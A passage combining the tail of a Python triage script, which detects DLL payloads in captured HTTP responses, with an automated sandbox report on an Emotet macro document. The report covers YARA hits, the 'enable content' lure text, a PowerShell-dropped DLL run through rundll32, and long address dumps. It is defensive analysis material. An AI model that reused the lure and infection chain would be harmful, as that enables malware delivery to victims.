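    struct.pack_into("<I", dos, 0x3C, 0x100)                 # e_lfanew as in the dump
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 5, DELPHI_TIMESTAMP, 0, 0, 0xE0, 0xA18E)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic, as in the dump
    names = [b"CODE", b"DATA", b"BSS", b".idata", b".reloc"]
    sections = b"".join(n.ljust(8, b"\0") + bytes(32) for n in names)
    return bytes(dos) + coff + bytes(opt) + sections


# Headers copied from the captured response.
SAMPLE_HEADERS = {
    "Content-Disposition": 'attachment; filename="O9TGnKaUCw.dll"',
    "Content-Type": "application/octet-stream",
}

if __name__ == "__main__":
    print(triage_response(SAMPLE_HEADERS, build_sample()))
```

The check keys on the bytes, so it still fires when a downloader serves the DLL as text/html or with no Content-Disposition at all; the Delphi timestamp and CODE/DATA/BSS names are useful pivots when hunting for sibling payloads in proxy logs.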

E-Banking Fraud:

Yara detected Emotet
Source: Yara match, type MEMORY. File sources:
0000000B.00000002.2116581505.0000000000240000.00000040.00000001.sdmp
0000000A.00000002.2113422714.00000000003F0000.00000040.00000001.sdmp
0000000A.00000002.2113576039.0000000000780000.00000040.00020000.sdmp
00000008.00000002.2108915228.0000000000260000.00000040.00000001.sdmp
0000000C.00000002.2120708575.00000000002C0000.00000040.00020000.sdmp
0000000C.00000002.2120498924.00000000001B0000.00000040.00000001.sdmp
00000008.00000002.2109055699.0000000000710000.00000040.00020000.sdmp
0000000D.00000002.2124089879.0000000000220000.00000040.00000001.sdmp
00000010.00000002.2350246723.00000000007D0000.00000040.00020000.sdmp
00000009.00000002.2111700747.00000000001F0000.00000040.00000001.sdmp
00000008.00000002.2108942082.00000000002A0000.00000040.00000001.sdmp
0000000F.00000002.2126847598.0000000000200000.00000040.00000001.sdmp
0000000E.00000002.2125021450.0000000000210000.00000040.00000001.sdmp
0000000A.00000002.2113404333.00000000003C0000.00000040.00000001.sdmp
00000010.00000002.2350021887.00000000002B0000.00000040.00000001.sdmp
0000000D.00000002.2124035115.00000000001F0000.00000040.00000001.sdmp
0000000D.00000002.2124200175.0000000000760000.00000040.00020000.sdmp
0000000F.00000002.2126913357.0000000000230000.00000040.00000001.sdmp
00000007.00000002.2107162967.0000000000400000.00000040.00020000.sdmp
0000000B.00000002.2116039169.0000000000170000.00000040.00020000.sdmp
0000000E.00000002.2125095238.0000000000270000.00000040.00000001.sdmp
0000000C.00000002.2120569228.0000000000220000.00000040.00000001.sdmp
00000009.00000002.2111875145.0000000000260000.00000040.00000001.sdmp
0000000F.00000002.2127036397.0000000000400000.00000040.00020000.sdmp
00000009.00000002.2112057590.0000000000340000.00000040.00020000.sdmp
0000000E.00000002.2124826552.0000000000170000.00000040.00020000.sdmp
00000010.00000002.2349984443.00000000001F0000.00000040.00000001.sdmp
0000000B.00000002.2116715619.0000000000430000.00000040.00000001.sdmp
00000007.00000002.2106916506.00000000001B0000.00000040.00000001.sdmp
00000007.00000002.2106771774.0000000000160000.00000040.00000001.sdmp
Source: Yara match, type UNPACKEDPE. File sources:
8.2.rundll32.exe.2a0000.0.unpack
13.2.rundll32.exe.220000.0.unpack
13.2.rundll32.exe.220000.0.raw.unpack
9.2.rundll32.exe.260000.0.unpack
7.2.rundll32.exe.1b0000.0.unpack
9.2.rundll32.exe.340000.1.raw.unpack
16.2.rundll32.exe.7d0000.1.raw.unpack
10.2.rundll32.exe.780000.1.raw.unpack
15.2.rundll32.exe.400000.1.unpack
8.2.rundll32.exe.710000.1.raw.unpack
12.2.rundll32.exe.2c0000.1.unpack
11.2.rundll32.exe.170000.0.unpack
7.2.rundll32.exe.400000.1.unpack
10.2.rundll32.exe.3f0000.0.unpack
14.2.rundll32.exe.170000.0.raw.unpack
11.2.rundll32.exe.240000.1.raw.unpack
12.2.rundll32.exe.220000.0.raw.unpack
16.2.rundll32.exe.2b0000.0.raw.unpack
13.2.rundll32.exe.760000.1.unpack
7.2.rundll32.exe.400000.1.raw.unpack
10.2.rundll32.exe.780000.1.unpack
13.2.rundll32.exe.760000.1.raw.unpack
16.2.rundll32.exe.7d0000.1.unpack
15.2.rundll32.exe.230000.0.unpack
11.2.rundll32.exe.170000.0.raw.unpack
9.2.rundll32.exe.340000.1.unpack
15.2.rundll32.exe.230000.0.raw.unpack
12.2.rundll32.exe.220000.0.unpack
11.2.rundll32.exe.240000.1.unpack
8.2.rundll32.exe.710000.1.unpack
8.2.rundll32.exe.2a0000.0.raw.unpack
16.2.rundll32.exe.2b0000.0.unpack
                      Source: Yara matchFile source: 12.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.260000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.3f0000.0.raw.unpack, type: UNPACKEDPE

                      System Summary:

                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                      Source: Screenshot number: 4, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I , Word
                      Source: Screenshot number: 4, Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                      Source: Screenshot number: 4, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4, Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I , Words: 8,758 I US I N@m 1
                      Source: Document image extraction number: 0, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 0, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Powershell drops PE file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\Kaktksw\An6othh\N49I.dll
                      Very long command line found
                      Source: unknown, Process created: Commandline size = 5677
                      Source: unknown, Process created: Commandline size = 5576
                      Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 5576
                      Source: C:\Windows\SysWOW64\rundll32.exe, Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe, Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 8_2_00771328 NtSetInformationKey,
                      Source: C:\Windows\SysWOW64\rundll32.exe, File created: C:\Windows\SysWOW64\Kvmkgtcj\
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00264152
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00277DA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026D1A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00269DAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00269DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002673A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002685B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002743BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002665BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026ED87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026C587
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027E985
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00267D8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00263F9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00261B9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027B998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026B5F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0026C9C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0027B5C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00260BCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00264DCA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00277BDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0074303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00751E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00357D7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003589F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00347E34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00358831
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034903F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034A83A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035C424
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034DC2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00342628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00344A2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00348816
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035F411
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034F813
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034D013
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034421E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00347605
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034620A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034C07D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00358668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00345856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00341658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00351259
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034D44C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035C04C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00354E4B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034704B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003456B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00355AB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00345EB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035CAA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00344EA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00348CA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035C6AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00354693
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00349AE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003542E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003494EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034C6EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035DEE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034D0DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003506C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00349CC8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035D2CB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035D530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034213E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035BF25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035DB25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034492A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00355115
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034CF11
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035231B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034A176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00351B71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00357570
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00353D7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035DD78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00358F65
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00352965
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00350F6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035676B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00356B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034CB42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035654F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00343D4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035EDB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003599A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00355DAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035E19F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003537F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035B3FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00345BE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00342DEE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035B1D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00344BDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00346BC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003573C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003577C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00359DC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035CDCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034ADCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003593C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020BC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F8217
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020502C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020C83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F923C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00203C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020C014
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F4C27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F9055
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC652
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00203856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FBC63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020D45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F8A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F3E9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002060B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002010BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00204689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F16B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020188F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020B499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020D099
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002004E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00206AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002010E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020D2EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002032F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002072F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F32C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00205AC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00201ED9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002084D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00205CDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020E32D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00206934
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00206D34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020893D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F6134
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020D713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00208F18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020531E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00207F6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F5155
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F4152
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020A972
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020C340
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020A746
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F6B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F2362
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F3F9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F1B9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00207DA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F7D8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FED87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC587
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002043BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F65BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020E985
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F85B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F9DAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F9DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F73A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020B998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FD1A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F0BCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F4DCA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC9C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020B5C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FB5F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00207BDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00381E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078704B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078903F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078DC2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078620A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00789CC8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00797D7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00793D7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078A176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0079654F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078492A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0079B3FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_007937F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_007989F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_007993C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078C07D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00798668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00781658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00791259
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00785856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00794E4B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078D44C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0079C04C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078A83A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00798831
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00787E34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00782628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00784A2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0079C424
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078421E
Source: Arch_2021_717-1562532.doc | OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation | OLE, VBA macro: Module A5ate73kc6cw5njy, Function Document_open
Source: Arch_2021_717-1562532.doc | OLE indicator, VBA macros: true
Source: N49I.dll.5.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.troj.evad.winDOC@28/8@1/4
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$ch_2021_717-1562532.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD799.tmp
Source: Arch_2021_717-1562532.doc | OLE indicator, Word Document stream: true
Source: Arch_2021_717-1562532.doc | OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe | Console Write: ............*...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......(.&.....L.................&.....
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....G................J.............}..v....HH......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....'...............T..j....0IQ...............J.............}..v.....O......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j.....O................J.............}..v....HP......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....3...............T..j....0IQ...............J.............}..v.....W......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j.....W................J.............}..v....HX......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....?...............T..j....0IQ...............J.............}..v....._......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j....._................J.............}..v....H`......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....K...............T..j....0IQ...............J.............}..v.....g......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j.....g................J.............}..v....Hh......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....W...............T..j....0IQ...............J.............}..v.....o......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....o................J.............}..v....Hp......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....c...............T..j....0IQ...............J.............}..v.....w......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j.....w................J.............}..v....Hx......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....o...............T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....{...............T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ.............................
